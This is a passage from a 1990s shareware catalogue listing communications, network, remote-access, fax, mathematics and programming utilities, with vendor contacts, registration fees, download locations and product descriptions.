WinNET Mail for MS Windows + Internet/Usenet access. See full description on page 420. + + 10.4.2 Network utilities + + Product: ES-NMB + Author: Extensions Software Corporation, 407-344-3322 + Version: 1.25 (05-01-95) + Needs: IBM PC, DOS 3.1 or better. 256k RAM; EGA monitor; Hard + disk. + Strongly recommended: Network (LAN). + Registration fee: $249.00 + Registration benefits: Full program functionality; printed + manual; 31/2" master disk(s); lifetime phone, fax, CompuServe, + newsletter, mail support; LAN license; all ASP-wide offers (see + + Chapter 10, "Communications" 434 + + + + page 6); disks of other shareware. Lifetime free upgrading + allowed. + Look for: availability unknown on BBSs; ESNMB.EXE on CompuServe + in CIS:NVENB forum LIBrary 18 (or contact userID 72007,571 for + assistance). + SWREG#: 1729 + PsL#: 11067 + Download size: 170k (about 13 minutes with a 2400 baud modem) + Description: + Features display of news and bulletins in graphics mode at user + login. Includes 36 different font sizes/types, selectable color + and shade, PCX/GIF view, and complete NMBA administration + system. + + + Product: Hands On Remote Control/Access [***] + Full featured remote support. See full description on + page 438. + + Product: Jokes & Quotes + Author: Michael L. Wester, 919-552-0767 + Version: 1.4 (02-12-94) + Needs: IBM PC, DOS 3.0 or better. + Registration fee: $15.00 + Registration benefits: printed manual; 3 months of unlimited + phone, CompuServe, mail support; LAN license; bonus data; all + ASP-wide offers (see page 6). + Look for: availability unknown on BBSs; JQ14.ZIP on CompuServe in + CIS:IBMNEW forum LIBrary 6 (or contact userID 73307,3547 for + assistance). + Download size: 333k (about 25 minutes with a 2400 baud modem) + Description: + Network ready or standalone, daily message display system. + Nearly 4000 jokes, quotes, stories, maxims, axioms, platitudes + & more can be selected from 25 "on screen" categories. Options + to print to any port, random select quotes, screen blanker, + change colors, reset category to any record and more! Send + messages across the net to all or special messages to selected + users, limit number of quotes displayed, administrator controls + categories displayed & more. Full mouse support & context + sensitive help. + + + Product: LAN Menu + Author: MicroFox Company, 216-659-9489 + Version: 2.05 (05-05-95) + Needs: IBM PC, DOS 2.0 or better. 256k RAM. + Strongly recommended: Hard disk; Network (LAN). + Registration fee: $29.00 (add $2.00 for shipping to U.S. + addresses) (add $3.00 for shipping to Canadian addresses) (add + $5.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime unlimited phone, fax, BBS, CompuServe, mail support; + 1-month limited return policy; LAN license; site license; bonus + + Chapter 10, "Communications" 435 + + + + utilities; all ASP-wide offers (see page 6); disks of other + shareware; discounts on other products. 1-month free upgrading + allowed. + Look for: LAN205.ZIP on BBSs (call 216-661-9065 to download it at + no charge); LAN205.ZIP on CompuServe in CIS:NOVUSER forum + LIBrary 7 (or contact userID 73057,3113 for assistance); + LAN205.ZIP on GEnie in IBMPC forum LIBrary 0. + Download size: 192k (about 14 minutes with a 2400 baud modem) + Description: + A menu and security system for all DOS based networks. Has up + to 10,000 menu entries that can run any programs, commands, or + batch files across the network. Includes password protection. + + + Product: NeMenu + Author: Just-In-Time Computing Services, 607-539-6609 + Version: 1.01 (12-01-93) + Needs: IBM PC, DOS 3.3 or better. 325k RAM; EGA monitor; Hard + disk; Network (LAN). DEC Pathworks(tm) Network. + Strongly recommended: Mouse. + Registration fee: $25.00 (add $3.00 for shipping to U.S. + addresses) (add $5.00 for shipping to Canadian addresses) (add + $8.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); 3 + months of unlimited phone, fax, BBS, CompuServe, GEnie, mail + support; lifetime return policy; all ASP-wide offers (see + page 6). 2-month free upgrading allowed. + Look for: NEMENU10.ZIP on BBSs (call 607-533-7072 to download it + at no charge); NMENU1.EXE on CompuServe in CIS:DECPCI forum + LIBrary 10 (or contact userID 73020,3205 for assistance). + Download size: 170k (about 13 minutes with a 2400 baud modem) + Description: + A PATHWORKS specific command menu that aids the network user in + connecting and disconnecting file and printer services and + gives the user access to print jobs, SETHOST and NETSETUP + commands through an attractive on-screen menu. Designed for + users not familiar with network command syntax. Features + include full mouse support, and a built-in screen blanker. Easy + installation and simplistic use, as well as an attractive on- + screen display make it a nice alternative to the USE command. + + Chapter 10, "Communications" 436 + + + + Product: Notice Board + Author: Cornerstone Software Limited, 01044-61-904-8143 + Version: 2.2 (03-07-94) + Needs: IBM PC, DOS 3.1 or better. + Registration fee: $95.00 + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); lifetime unlimited phone, fax, CompuServe, mail + support; LAN license; all ASP-wide offers (see page 6); + discounts on other products. + Look for: NB22.ZIP on BBSs (call 718-837-3236 to download it at + no charge); NB22.EXE on CompuServe in CIS:NOVUSER forum LIBrary + 8 (or contact userID 71461,556 for assistance). + SWREG#: 1570 + PsL#: 11044 + Download size: 230k (about 17 minutes with a 2400 baud modem) + Description: + Provides all of the facilities of an office notice board on the + PCs attached to your network, and a menu system (without memory + overhead), rolled into one. As well as key notices, which + appear automatically whenever the package is run, it has a + simple-to-use menu structure allowing users to browse through a + potentially huge database of further information. In use in + the USA, Canada, Europe and Australia by everyone from + government agencies to schools. + + + Product: x-NEWS3 + Author: Extensions Software Corporation, 407-344-3322 + Version: 1.57 (05-01-95) + Needs: IBM PC, DOS 3.1 or better. 256k RAM; Hard disk. + Strongly recommended: Network (LAN). + Registration fee: $132.50 + Registration benefits: Full program functionality; printed + manual; 31/2" master disk(s); lifetime phone, fax, CompuServe, + newsletter, mail support; LAN license; all ASP-wide offers (see + page 6); disks of other shareware. Lifetime free upgrading + allowed. + Look for: availability unknown on BBSs; XNEWS3.EXE on CompuServe + in CIS:NVENB forum LIBrary 18 (or contact userID 72007,571 for + assistance). + SWREG#: 1125 + PsL#: 10888 + Download size: 65k (about five minutes with a 2400 baud modem) + Description: + Allows posting of bulletins and announcements at user login, + including automatic tracking of displayed notices per user, + configurable display intervals, and imbedded color text command + macros. Easy-to-use and network-aware of both Banyan VINES(R) + and Novell NetWare(R). + + + 10.5 Remote computer access + + See also: Communications, Networks, Modem-based networks. + + Chapter 10, "Communications" 437 + + + + Product: Hands On Remote Control/Access [***] + Author: P. C. Softsmith, 604-433-5189 + Version: 5.5 (08-29-95) + Needs: IBM PC, DOS 3.0 or better. 256k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive. + Strongly recommended: Hayes-compatible modem. + Registration fee: $50.00 + Registration benefits: Full program functionality; choice of 31/2" + or 51/4" master disk(s); 3 months of unlimited BBS, CompuServe, + mail support; LAN license; site license; bonus utilities; all + ASP-wide offers (see page 6); registration commissions. 1 free + update disk(s) sent out. + Look for: HANDSON.ZIP on BBSs; HANDSON.ZIP on CompuServe in + CIS:PCCOM forum LIBrary 3 (or contact userID 75020,2664 for + assistance). + SWREG#: 4509 + Download size: 750k (about 56 minutes with a 2400 baud modem) + Description: + Full featured DOS remote support, access, or control. Its + modular design encourages use in a wide range of situations, + including very small ram availability. Has wide selection of + options and can be customised to fit local needs. Includes 465 + modem setup strings. Many internal revisions, including + changes to help it run under OS/2 and the Windows variants up + to WIN95. + + + 10.6 Fax machines & fax cards + + Product: FAXHAVEN + Author: HTF Consulting, 510-521-1689 + Version: 1.0 (10-01-94) + Needs: IBM PC, DOS 1.0 or better. 640k RAM; Hercules monitor; + Hard disk; Hayes-compatible modem. faxmodem with software + (BITFAX, QUICK-LINK, Frecom, Complete PC). + Registration fee: $39.00 (add $3.00 for shipping to U.S. + addresses) (add $5.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; printed + manual; choice of 31/2" or 51/4" master disk(s); 4 months of phone, + fax, CompuServe, mail support; bonus utilities; bonus data; all + ASP-wide offers (see page 6); discounts on other products. + Lifetime free upgrading allowed. + Look for: availability unknown on BBSs. + Download size: 270k (about 20 minutes with a 2400 baud modem) + Description: + Access for processing of received FAXes. View, print, convert + to other graphic, archive, delete. DOS-based, Funxn-Key driven. + Parks disk drive heads. Alerts user to received FAxes. + + Chapter 10, "Communications" 438 + + + + Product: HQ-FAX (1-Step High Quality FAX + Author: HTF Consulting, 510-521-1689 + Version: 2.0 (09-30-94) + Needs: IBM PC, DOS 3.0 or better. 640k RAM. + Registration fee: $29.00 (add $3.00 for shipping to U.S. + addresses) (add $3.00 for shipping to Canadian addresses) (add + $5.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; printed + manual; choice of 31/2" or 51/4" master disk(s); 4 months of + unlimited phone, CompuServe, mail support; bonus data; bonus + fonts; bonus graphics; discounts on other products; discounts + on upgrades. Lifetime free upgrading allowed. + Look for: availability unknown on BBSs. + Download size: 230k (about 17 minutes with a 2400 baud modem) + Description: + DOS-based, Funxn-Key driven. Converts and sends documents in 1 + step. uses Epson LQ print files as input. Produces a variety of + output formats. Works with FAX modem products; BITFAX, + QUICKLINK, FRECOM, Complete PC. Many value-adding features for + your FAX modem. Variety of fonts & type-sizes. Integrated + graphics, custom forms. + + + Product: wfListen + Mediates between comms program & WinFax. See full description + on page 420. + + + 10.7 Voice mail systems + + Product: Folders + Personal information manager network email. See full + description on page 170. + + Product: Link + Connects program to callback service. See full description on + page 419. + + + 10.8 Call logging & analysis + + See also: Utilities, Desktop utilities, Phone dialers. + + Product: BBS Communications + BBS communications for uploading/downloading. See full + description on page 418. + + Product: dbDIAL(tm) + 7k TSR database/dialer. See full description on page 159. + + Product: PCFDial + Powerful 7k TSR voice/fax screen autodialer. See full + description on page 156. + + Chapter 10, "Communications" 439 + + + + 10.8.1 Phone bill analyzers + + See also: Business, Business finances, Billing/invoice systems. + + Product: Qanalyst + Author: Barn Owl Software, 618-632-7345 + Version: 2.05 (09-19-90) + Needs: IBM PC, DOS 2.0 or better. 512k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive. Qmodem v3.0 or better. + Registration fee: $22.50 (add $3.00 for shipping outside U.S. or + Canada) + Registration benefits: printed manual; 51/4" master disk(s); 12 + months of unlimited phone, fax, CompuServe, newsletter, mail + support; 1-month return policy; all ASP-wide offers (see + page 6); discounts on other products. Lifetime free upgrading + allowed. + Look for: QANA-205.ZIP on BBSs; QANLYS.ZIP on CompuServe in + CIS:PCCOM forum LIBrary 2 (or contact userID 74017,1344 for + assistance); QANA-205.ZIP on GEnie in QMODEM forum LIBrary 1 + (or contact userID R.ROSENBERGE for assistance). + Download size: 160k (about twelve minutes with a 2400 baud modem) + Description: + Analyzes Qmodem log files so you know how much you SPEND on + modem calls. Great for CompuServe & GEnie users! Keeps track + of holidays when rates go down. Analyzes uploads & downloads + too, including the cost to transfer files. Powerful + maintenance facility keeps Qmodem log files as small as + possible. Uses Call Data Standard phone-rate files. + + + 10.9 File transfer protocols + + Product: BBS Communications + BBS communications for uploading/downloading. See full + description on page 418. + + Product: COM-AND + Communications and accessories. See full description on + page 418. + + Product: Hands On Remote Control/Access [***] + Full featured remote support. See full description on + page 436. + + Chapter 10, "Communications" 440 + + + + Product: PCM100.COM + Author: Charier Consultants Services, 331-4001-9415 + Version: 1.01 (08-25-91) + Needs: IBM PC, DOS 2.1 or better. Serial port (COM1/COM2), null + modem cable, TRS-80 Model 100/200. + Registration fee: $25.00 + Registration benefits: 3 months of support; source code. + Look for: availability unknown on BBSs; PCM100.ZIP on CompuServe + in CIS:IBMCOM forum LIBrary 3 (or contact userID 73170,2176 for + assistance). + Download size: 28k (about two minutes with a 2400 baud modem) + Description: + A communications program allowing text files exchanges between + a TRS-80 Model 100 hand-held computer (or compatible) and any + PC-XT (or close compatible, like the Tandy 1000 PC) via the + serial port (RS-232C) and a null-modem adapter. Most of upper + ASCII characters are automatically translated as well during + downloading as well as uploading. + + + Product: Safe Program + Lock files in a software safe - Email secure. See full + description on page 45. + + + 10.10 Communication utilities + + Product: BBS Communications + BBS communications for uploading/downloading. See full + description on page 418. + + Product: CTS Serial Port Utilities + Serial port diagnositic and control utilities. See full + description on page 83. + + Product: DBKIT [***] + Xbase programming & maintenance. See full description on + page 293. + + Product: FSLOGIN + Full screen login program for Novell networks. See full + description on page 444. + + Product: Hands On Remote Control/Access [***] + Full featured remote support. See full description on + page 436. + + Product: Snooper + Fast, friendly, powerful system info utility. See full + description on page 133. + + Chapter 10, "Communications" 441 + + + + Product: WatchDog + Author: Software & Consulting, +43-1-876-46-090 + Version: 1.21 (10-30-92) + Needs: IBM PC, DOS 3.3 or better. 1k RAM. + Registration fee: $0.00 + Registration benefits: lifetime CompuServe support. + Look for: availability unknown on BBSs; WTCHDG.ZIP on CompuServe + in CIS:IBMBBS forum LIBrary 2 (or contact userID 100015,551 for + assistance). + Download size: 13k (about one minute with a 2400 baud modem) + Description: + v/ A resident utility to monitor the activity of a COM port + (carrier) and DOS. + v/ Its main use is with BBS software that hands control to + e.g. a shell program. When the shell program hangs or + carrier loss is detected the serial port DTR is dropped + (hangup) and the machine is rebooted. + v/ A ring count watch has been added. This allows to reboot + when the BBS program fails to go off-hook. The ring watch + can be customized and be disabled. + + + Product: WinNET Mail for MS Windows + Internet/Usenet access. See full description on page 420. + + 10.10.1 File format translators + + See also: Utilities, File utilities, File sorting & conversion. + + Product: PCM100.COM + File transfer utility for PC <-> Model 100. See full + description on page 439. + + + 10.11 Software tools & add-ins + + 10.11.1 For multiple programs + + Product: Hands On Remote Control/Access [***] + Full featured remote support. See full description on + page 436. + + Product: WatchDog + Carrier watchdog program for BBSs. See full description on + page 440. + + Product: wfListen + Mediates between comms program & WinFax. See full description + on page 420. + + Chapter 10, "Communications" 442 + + + + 10.11.2 For TAPCIS + + Product: Recon + Full management of CompuServe message files. See full + description on page 422. + + 10.11.3 For PCBoard + + Product: Medieval War Door + BBS door game for medieval war/strategy. See full description + on page 425. + + 10.11.4 For Qmodem + + Product: Qanalyst + Phone bill analyzer for people who use Qmodem. See full + description on page 439. + + 10.11.5 For OzCIS + + Product: Recon + Full management of CompuServe message files. See full + description on page 422. + + 10.11.6 For other + + Product: COM-AND + Communications and accessories. See full description on + page 418. + + Product: Recon + Full management of CompuServe message files. See full + description on page 422. + + Product: Tag Line Xpress + Author: Ron Janorkar, 212-334-1243 + Version: 4.00 (05-20-94) + Needs: IBM PC, DOS 3.2 or better. 512k RAM; Hard disk. QWK mail + reader software. + Strongly recommended: CGA monitor. + Registration fee: $20.00 + Registration benefits: lifetime unlimited phone, fax, BBS, mail + support; disks of other shareware. Lifetime free upgrading + allowed. + Look for: TAGLX400.ZIP on BBSs (call 718-716-6198 to download it + at no charge). + Download size: 215k (about 16 minutes with a 2400 baud modem) + Description: + Enhanced tagline manager for offline mail readers. Offers + unlimited taglines, installs automatically into several + readers, has a built in quoter and signature manager, steal + every tagline from QWK and Blue Wave mail packets, even + suggests taglines based on the subject and message content. + + Chapter 10, "Communications" 443 + + + + 10.12 Other + + Product: FSLOGIN + Author: Confirm + Version: 2.01 (07-01-95) + Needs: IBM PC, DOS 3.3 or better. 340k RAM; Network (LAN). + Novell NetWare 2.15 - 4.01. + Registration fee: $129.00 (add $10.00 for shipping to U.S. + addresses) (add $10.00 for shipping to Canadian addresses) (add + $10.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; 31/2" master disk(s); 6 + months of fax, CompuServe, mail support; LAN license. 1 free + update disk(s) sent out. + Look for: availability unknown on BBSs; FSL201.ZIP on CompuServe + in CIS:NOVUSER forum LIBrary 0 (or contact userID 100334,572 + for assistance). + Download size: 110k (about eight minutes with a 2400 baud modem) + Description: + All users hooked to a Novell network have at least one thing in + common: they must login to gain access to applications & data. + This program enhances the way you login to a server by + providing a full-screen Novell style menu. It does extensive + checking of accounting and security exceptions before actually + logging in. Supports NetWare Directory services as well as + bindery bases servers. + + + Product: Teleshare/DOS Remote Access [***] + Author: P. C. Softsmith, 604-433-5189 + Version: 3 (06-01-95) + Needs: IBM PC, DOS 3.0 or better. 20k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive; Modem. + Registration fee: $35.00 + Registration benefits: Full program functionality; 3 months of + unlimited CompuServe, mail support; bonus utilities; all ASP- + wide offers (see page 6); registration commissions. 1 free + update disk(s) sent out. + Look for: TS3*.ZIP on BBSs; TS3*.ZIP on CompuServe in CIS:PCCOM + forum LIBrary 3 (or contact userID 75020,2664 for assistance). + SWREG#: 4510 + Download size: 500k (about 37 minutes with a 2400 baud modem) + Description: + Good basic remote support and access to 115200 baud. Has small + RAM presence and snappy screen updates, enabling its use in + workplace settings avoided by others. Minimally intrusive and + easily customized to fit your needs. Can be installed as an + add-in (eg to telix), and or with your software package. + + Chapter 11, "Mathematics" 444 + + + + + + Chapter 11 + Mathematics + + See also: Utilities, Desktop utilities, Calculators; Education, + Math. + + + 11.1 General math + + Product: AstroFormulaCalculator 3 + Spreadsheet calculator science engin finance. See full + description on page 270. + + Product: Equatron + Beat the computer at solving the equation. See full + description on page 677. + + Product: Math Bingo + Learn math facts while playing bingo. See full description on + page 509. + + Product: Math Wiz + Financial calculator. See full description on page 403. + + Product: MERLIN'S MATH + Game teaches multiplication & long division. See full + description on page 512. + + Product: Mouse Math [***] + A whimsical verbal math drill program. See full description on + page 532. + + Product: Treasure Hunt Math + Math in arcade-style game for home & school. See full + description on page 513. + + Product: WinGraph + Author: XWare, Inc., 212-262-4481 + Version: 1.1 (03-05-93) + Needs: IBM PC, Windows 3.0 or better. + Registration fee: $35.00 + Registration benefits: Master disks. + Look for: WNGRPH1.ZIP on BBSs; WNGRPH.ZIP on CompuServe in + CIS:WINADV forum LIBrary 15 (or contact userID 76477,2113 for + assistance); WNGRPH1.ZIP on GEnie in IBMPC forum LIBrary 15 (or + contact userID XTY61333 for assistance). + Download size: 83k (about six minutes with a 2400 baud modem) + Description: + This equation graphing program for Windows 3.x includes: + cartesian coordinate graphs in 2D and 3D, polar coordinate + graphs, solutions to equations, simultaneous 2D graphs, + variable solution ranges, rotation and zoom of 3D graphs, + + Chapter 11, "Mathematics" 445 + + + + printing, and use of the Windows clipboard for transferring + graphs to other applications. New to version 1.1 is a context + sensitive button bar interface and better multi-tasking + support. + + + Product: XYSee + Author: Insight Advantage, 817-346-9116 + Version: 4.0a (09-04-94) + Needs: IBM AT (80286), DOS 2.1 or better. 384k RAM; Program can + run safely on a system with no hard disk and only one floppy + disk drive; VGA monitor. + Strongly recommended: Hard disk; HP DeskJet printer; HP + LaserJet printer; Mouse; Epson printer; CD-ROM drive. + Registration fee: $30.00 (add $3.00 for shipping outside U.S. or + Canada) + Registration benefits: printed manual; quick-reference card; + choice of 31/2" or 51/4" master disk(s); 12 months of CompuServe, + mail support; bonus utilities; bonus data; bonus templates; all + ASP-wide offers (see page 6). 12-month free upgrading allowed. + 1 free update disk(s) sent out. + Look for: XYSEE4.ZIP on BBSs; XYSEE4.ZIP on CompuServe in + CIS:IBMAPP forum LIBrary 11 (or contact userID 73627,3532 for + assistance). + SWREG#: 3309 + PsL#: 10176 + Download size: 189k (about 14 minutes with a 2400 baud modem) + Awards & nominations: 1994 finalist, Shareware Industry Awards. + Description: + Middle/High school & College visual math for Windows & DOS. + Highly interactive, visually oriented, Algebra, Geometry & + Trigonometry supplement. Covers SAT, ACT, & Math Placement + Material from points to parametrics. Sensational 3-D interface + with colorful icons, button bars, & in-cell editing. Includes + comprehensive Tutorial, Multi-level feature help & printable + performance reports. Auto-installs, and starts from Windows + icon or DOS prompt. + + + 11.2 Statistics + + Product: Lotto Challenger + Lottery analysis for Pick 5 and 6 lotteries. See full + description on page 625. + + Chapter 11, "Mathematics" 446 + + + + Product: Nonlin + Author: Phillip H. Sherrod, 615-292-2881 + Version: 2.4 (06-25-93) + Needs: IBM PC, DOS 2.0 or better. 640k RAM; Hard disk. + Strongly recommended: VGA monitor. + Registration fee: $25.00 (add $5.00 for shipping to Canadian + addresses) (add $5.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 3 months of phone, CompuServe, mail support; + 3-month return policy; bonus utilities. + Look for: NONLIN*.ZIP on BBSs (call 415-323-4193 to download it + at no charge); NONLIN.ZIP on CompuServe in CIS:IBMAPP forum + LIBrary 13 (or contact userID 76166,2640 for assistance). + Download size: 194k (about 15 minutes with a 2400 baud modem) + Description: + Determines the values of parameters for an equation, whose form + you specify, that cause the equation to best fit a set of data + values. Handles linear, multivariate, polynomial, and general + nonlinear equations. You specify form of equation using normal + algebraic notation. Can plot data and equation. Can also find + the root of a nonlinear equation. Forty page manual explains + regression analysis and provides many examples. Best shareware + regression program available. In use at many labs. + + + Product: PCStat + Author: PC Information Systems, 702-342-0376 + Version: 2.7 (01-01-94) + Needs: IBM PC, DOS 2.0 or better. 640k RAM; Hard disk. + Registration fee: $29.95 (Canadian dollars) (add $3.00 (Canadian + dollars) for shipping to U.S. addresses) (add $3.00 (Canadian + dollars) for shipping to Canadian addresses) (add $3.00 + (Canadian dollars) for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 12 months of unlimited phone, CompuServe, mail + support. 1-month return policy. + Look for: PCSTAT27.ZIP on BBSs (call 702-849-2209 to download it + at no charge); PCSTAT.ZIP on CompuServe in CIS:IBMAPP forum + LIBrary 13 (or contact userID 71360,72 for assistance); + PCSTAT27.ZIP on GEnie in IBMPC forum LIBrary 15 (or contact + userID R.SCHOENBECK for assistance). + Download size: 315k (about 24 minutes with a 2400 baud modem) + Description: + Superb descriptive statistics report program for varible data. + Easy to use even for statistics or computer novices. Lotus like + user interface enhanced with pull-down menus. Sample report. + Context sensitive help. Accepts Lotus, ASCII, DIF and prepared + dBase data. Manual keying in of data also possible. Reports are + professional and uncomplicated to comprehend. Ideal for many + business and industry situations. + + Chapter 11, "Mathematics" 447 + + + + Product: Simstat + Author: Provalis Research, 514-899-1672 + Version: 3.0e (04-01-94) + Needs: IBM PC, DOS 2.11 or better. 356k RAM; CGA monitor; Hard + disk. + Strongly recommended: math coprocessor. + Registration fee: $65.00 (add $6.00 for shipping to U.S. + addresses) (add $6.00 for shipping to Canadian addresses) (add + $8.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 3 months of unlimited CompuServe, mail support; + 1-month return policy; discounts on upgrades. 6-month free + upgrading allowed. 1 free update disk(s) sent out. + Look for: availability unknown on BBSs; SIMST*.ZIP on CompuServe + in CIS:IBMAPP forum LIBrary 13 (multiple files) (or contact + userID 71760,2103 for assistance). + PsL#: 10645 + Download size: 480k (about 36 minutes with a 2400 baud modem) + Description: + Easy & powerful statistical analysis with pulldown menus + context sentitive help & mouse support. Reads ASCII, dBase, + Lotus, SPSS files. Performs descriptive, frequency, crosstab, + breakdown, multiple responses, t-test, n-way anova/ancova, + linear, nonlinear & multiple regression, time-series, + reliability, ROC curves, nonparametric tests, & powerful + bootstrap resampling analysis. Prints hi-res graphs (bar, pie, + Pareto, histogram, ogive, box-&-whisker, scatterplot, etc.) on + most printers/plotters. + + + Product: Windows Lotto + Analysis & wheeling for Pick 5 & 6 lotteries. See full + description on page 626. + + Chapter 11, "Mathematics" 448 + + + + 11.3 Function & curve plotting + + Product: FDplot + Author: Abri Technologies, Inc. + Version: 1.3 (07-12-92) + Needs: IBM PC, DOS 3.3 or better. 100k RAM; CGA monitor. + GWBASIC or QBASIC. + Strongly recommended: Hard disk. + Registration fee: $15.00 (add $1.00 for shipping outside U.S. or + Canada) + Registration benefits: Full program functionality; choice of 31/2" + or 51/4" master disk(s); 3 months of phone, CompuServe, mail + support; royalty-free source code; discounts on upgrades; + registration commissions. + Look for: availability unknown on BBSs; FDPLOT.EXE on CompuServe + in CIS:SCIENCE forum LIBrary 8 (or contact userID 72345,1623 + for assistance). + Download size: 15k (about one minute with a 2400 baud modem) + Description: + A data and scientific function plotting package intended for + upper high-school or college students and instructors. It is + menu driven, fast and less fuss to use than most graphics + calculators. + + + Product: Mathplot + Author: Phillip H. Sherrod, 615-292-2881 + Version: 3.2 (11-21-92) + Needs: IBM PC, DOS 2.0 or better. 512k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive; CGA monitor; Hard disk. + Strongly recommended: HP LaserJet printer. + Registration fee: $20.00 (add $5.00 for shipping to Canadian + addresses) (add $5.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 3 months of phone, CompuServe, mail support. + 3-month return policy. + Look for: MATHPL*.ZIP on BBSs (call 415-323-4193 to download it + at no charge); MATHPL.ZIP on CompuServe in CIS:IBMAPP forum + LIBrary 13 (or contact userID 76166,2640 for assistance). + Download size: 125k (about ten minutes with a 2400 baud modem) + Awards & nominations: 1992 finalist, Shareware Industry Awards. + Description: + Lets you enter complicated mathematical functions using + ordinary algebraic notation and immediately plot them on the + screen or an HP LaserJet printer. Cartesian, polar, and + parametric equations are supported and up to 4 functions can be + displayed at once. Scaling is automatic and you can control + axis display and grid lines. A rich set of library routines is + provided. An excellent program for anyone who needs to quickly + visualize mathematical functions. + + Chapter 11, "Mathematics" 449 + + + + Product: Nonlin + Linear and nonlinear statistical regression. See full + description on page 445. + + Product: PLOTTER + Author: Wells Computing Services, 813-447-0604 + Version: 7.1 (07-04-95) + Needs: IBM PC, DOS 3.0 or better. 640k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive; CGA monitor; HP LaserJet printer; Mouse; Epson printer; + math coprocessor. + Strongly recommended: VGA monitor; Hard disk. + Registration fee: $15.00 + Registration benefits: Full program functionality; printed + manual; choice of 31/2" or 51/4" master disk(s); 3 months of phone, + mail support; 1-month limited return policy; site license; + discounts on upgrades. + Look for: PLOTR71.ZIP on BBSs. + Download size: 130k (about ten minutes with a 2400 baud modem) + Description: + A DOS program for data plotting and analysis. The program + includes a data editor, curve fitting, Fast Fourier Transforms + and digital filtering. Features include flexible plot + labelling, data value cursor, printer hard copy and PCX screen + output. This compact and versatile program is ideal for + graphing and analyzing data from lab experiments, computer + simulations and data acquisition systems. Comes with on-line + instructions. + + + Product: XYSee + Mid/Hi-school visual math for Windows & DOS. See full + description on page 445. + + + 11.4 Mathematical utilities + + Product: Convert It!(tm) SE + Versatile unit of measure converter. See full description on + page 382. + + Product: Mathplot + Mathematical function plotting program. See full description + on page 448. + + Product: METRIC-X + Metric-English-Metric conversion utility. See full description + on page 381. + + Product: Nonlin + Linear and nonlinear statistical regression. See full + description on page 445. + + Chapter 11, "Mathematics" 450 + + + + Product: Sci & Eng Tool for Lotus 1-2-3 + Solver and programmable calculator for 1-2-3. See full + description on page 307. + + Chapter 12, "Computer programming" 451 + + + + + + Chapter 12 + Computer programming + + + 12.1 CASE tools + + Product: Chartist(tm) + Flowcharting and org charting. See full description on + page 553. + + Product: EDGEFLOW + Flowcharting and diagramming tool for DOS. See full + description on page 554. + + Product: Playground + Author: Object International, Inc. + Version: 1.0a (01-04-95) + Needs: IBM 80386, Windows 3.1 or better. 8196k RAM; VGA monitor; + Mouse. Win32s. + Registration fee: $40.00 + Registration benefits: 31/2" master disk(s); 24 months of unlimited + fax, CompuServe, newsletter, mail support; 1-month return + policy; all ASP-wide offers (see page 6); discounts on + upgrades. 3-month free upgrading allowed. 1 free update + disk(s) sent out. + Look for: availability unknown on BBSs; PLAYGR.EXE on CompuServe + in CIS:CASE forum LIBrary 2 (or contact userID 71210,3642 for + assistance). + SWREG#: 5751 + Download size: 1300k (about 97 minutes with a 2400 baud modem) + Description: + Especially suited for teams of domain experts and object + modelers, working together during the early stages of a new + project. It's a great way to get started with building + effective object models. Features: drag-and-drop classes, + attributes, services, connections; multiple views; view + management, with view categories, selective hiding/showing; + full control over connections, right-angled or diagonal + connections; extensive customization with preferences. + + + Product: PROGRAM ENTITY ORGANIZER + Analysis and documentation tool for COBOL. See full + description on page 480. + + + 12.2 Database engines + + See also: Database applications. + + Chapter 12, "Computer programming" 452 + + + + Product: Easy Base + Rapid application development system. See full description on + page 276. + + Product: Keyed File System (DOS) + Author: APT Computer Solutions, Inc., 606-873-0589 + Version: 2.12 (05-16-94) + Needs: IBM PC, DOS 3.3 or better. 20k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive. + Strongly recommended: Hard disk. + Registration fee: $49.95 (add $3.00 for shipping to U.S. + addresses) (add $5.00 for shipping to Canadian addresses) (add + $5.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 12 months of unlimited CompuServe, mail + support; 3-month return policy; royalty-free runtime license; + all ASP-wide offers (see page 6); discounts on other products; + discounts on upgrades. 1 free update disk(s) sent out. + Look for: KFSD212.ZIP on BBSs (call 606-233-0154 to download it + at no charge); KFSD.ZIP on CompuServe in CIS:IBMPRO forum + LIBrary 3 (or contact userID 73023,3037 for assistance). + Download size: 44k (about four minutes with a 2400 baud modem) + Description: + A set of powerful, easy to use, subroutines that allow the + Microsoft C (Version 6 and 7) programmer to write programs + using files with alphabetic or numeric keys. The package + provides common keyed file operations such as read by key, read + sequentially, read using partial key, add, replace, and delete. + + + Product: Keyed File System (OS/2) + Author: APT Computer Solutions, Inc., 606-873-0589 + Version: 2.12 (04-11-94) + Needs: IBM 80386, OS/2 2.0 or better. 20k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive. + Strongly recommended: Hard disk. + Registration fee: $49.95 (add $3.00 for shipping to U.S. + addresses) (add $5.00 for shipping to Canadian addresses) (add + $5.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 12 months of unlimited CompuServe, mail + support; 3-month return policy; royalty-free runtime license; + all ASP-wide offers (see page 6); discounts on other products. + Look for: KFSO212.ZIP on BBSs (call 606-233-0154 to download it + at no charge); KFSO.ZIP on CompuServe in CIS:IBMPRO forum + LIBrary 3 (or contact userID 73023,3037 for assistance). + Download size: 50k (about four minutes with a 2400 baud modem) + Description: + A set of powerful, easy to use, subroutines that allow the OS/2 + programmer to create and use files having alphabetic or numeric + keyes. These routines are language independent and allow you to + write applications that create and use keyed files. Records in + + Chapter 12, "Computer programming" 453 